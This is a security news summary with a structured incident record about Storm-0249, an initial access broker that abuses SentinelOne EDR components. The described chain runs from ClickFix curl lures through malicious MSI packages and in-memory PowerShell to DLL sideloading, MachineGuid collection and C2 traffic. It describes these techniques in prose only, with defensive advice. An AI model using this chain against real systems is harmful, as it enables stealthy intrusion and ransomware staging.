SentinelOne: Ransomware IAB abuses EDR for stealthy malware execution

**Storm-0249 Exploits EDR Solutions in Stealthy Ransomware Prep Attacks**

A threat actor tracked as Storm-0249 is leveraging endpoint detection and response (EDR) solutions and trusted Windows utilities to deploy malware, establish persistence, and prepare for ransomware attacks. Cybersecurity firm ReliaQuest observed the group moving beyond traditional phishing tactics, adopting more sophisticated methods that evade detection even in well-defended environments.

In a recent attack, Storm-0249 abused SentinelOne EDR components—though researchers note the technique could apply to other EDR products. The campaign began with ClickFix social engineering, tricking users into executing curl commands via the Windows Run dialog to download a malicious MSI package with SYSTEM privileges. A PowerShell script, fetched from a spoofed Microsoft domain, was then loaded directly into memory to avoid disk-based detection.

The MSI file dropped a malicious DLL (SentinelAgentCore.dll), strategically placed alongside the legitimate SentinelAgentWorker.exe—a trusted SentinelOne EDR process. By DLL sideloading, the attacker executed malicious code within the signed, privileged process, blending in with routine EDR activity and evading security tools. This persistence method even survived OS updates.

Once inside, Storm-0249 used the compromised EDR process to collect system identifiers (including MachineGuid, a hardware-based ID used by ransomware groups like LockBit and ALPHV) via legitimate Windows utilities (reg.exe, findstr.exe). Encrypted HTTPS command-and-control (C2) traffic was funneled through the trusted process, bypassing traditional monitoring.

The attack highlights a growing trend of abusing signed, trusted processes to conduct malicious activity without raising alarms. ReliaQuest notes that behavior-based detection—such as flagging trusted processes loading unsigned DLLs from unusual paths—could help mitigate such threats. Additionally, stricter controls on curl, PowerShell, and living-off-the-land binaries (LoLBins) may reduce exposure.

Storm-0249’s tactics suggest a shift toward initial access operations tailored for ransomware affiliates, emphasizing stealth and persistence over broad, noisy campaigns.

Source: https://www.bleepingcomputer.com/news/security/ransomware-iab-abuses-edr-for-stealthy-malware-execution/

SentinelOne cybersecurity rating report: https://www.rankiteo.com/company/sentinelone

"id": "SEN1765296030",
"linkid": "sentinelone",
"type": "Ransomware",
"date": "12/2025",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"

{'attack_vector': ['Social Engineering (ClickFix)',
                   'DLL Sideloading',
                   'Malicious MSI Package'],
 'data_breach': {'sensitivity_of_data': 'Hardware-based identifiers used for '
                                        'ransomware encryption key binding',
                 'type_of_data_compromised': 'System identifiers '
                                             '(MachineGuid)'},
 'description': 'An initial access broker tracked as Storm-0249 is abusing '
                'endpoint detection and response (EDR) solutions and trusted '
                'Microsoft Windows utilities to load malware, establish '
                'communication, and persistence in preparation for ransomware '
                'attacks. The threat actor leveraged SentinelOne EDR '
                'components to hide malicious activity, though the method '
                'works with other EDR products. The attack involved ClickFix '
                'social engineering, malicious MSI packages, and DLL '
                'sideloading to evade detection and maintain persistence.',
 'impact': {'operational_impact': 'Stealthy persistence and '
                                  'command-and-control (C2) communication'},
 'initial_access_broker': {'backdoors_established': 'DLL sideloading via '
                                                    'SentinelAgentWorker.exe',
                           'entry_point': 'ClickFix social engineering and '
                                          'malicious MSI packages'},
 'lessons_learned': 'Abuse of trusted EDR processes can bypass traditional '
                    'monitoring. Behavior-based detection and stricter '
                    'controls for utilities like curl, PowerShell, and LoLBins '
                    'are recommended.',
 'motivation': 'Initial access for ransomware affiliates',
 'post_incident_analysis': {'corrective_actions': ['Behavior-based detection '
                                                   'for unsigned DLL loading',
                                                   'Stricter controls for '
                                                   'utilities like curl and '
                                                   'PowerShell'],
                            'root_causes': 'Abuse of trusted EDR processes and '
                                           'signed executables for stealthy '
                                           'persistence and C2 communication'},
 'recommendations': ['Implement behavior-based detection to identify trusted '
                     'processes loading unsigned DLLs from non-standard paths',
                     'Set stricter controls for curl, PowerShell, and LoLBin '
                     'execution'],
 'references': [{'source': 'ReliaQuest'}],
 'response': {'enhanced_monitoring': 'Behavior-based detection for trusted '
                                     'processes loading unsigned DLLs',
              'third_party_assistance': 'ReliaQuest (cybersecurity company)'},
 'threat_actor': 'Storm-0249',
 'title': 'Storm-0249 Abuses EDR Solutions for Stealthy Ransomware Attacks',
 'type': 'Ransomware Preparation',
 'vulnerability_exploited': 'Abuse of trusted EDR processes and signed '
                            'executables'}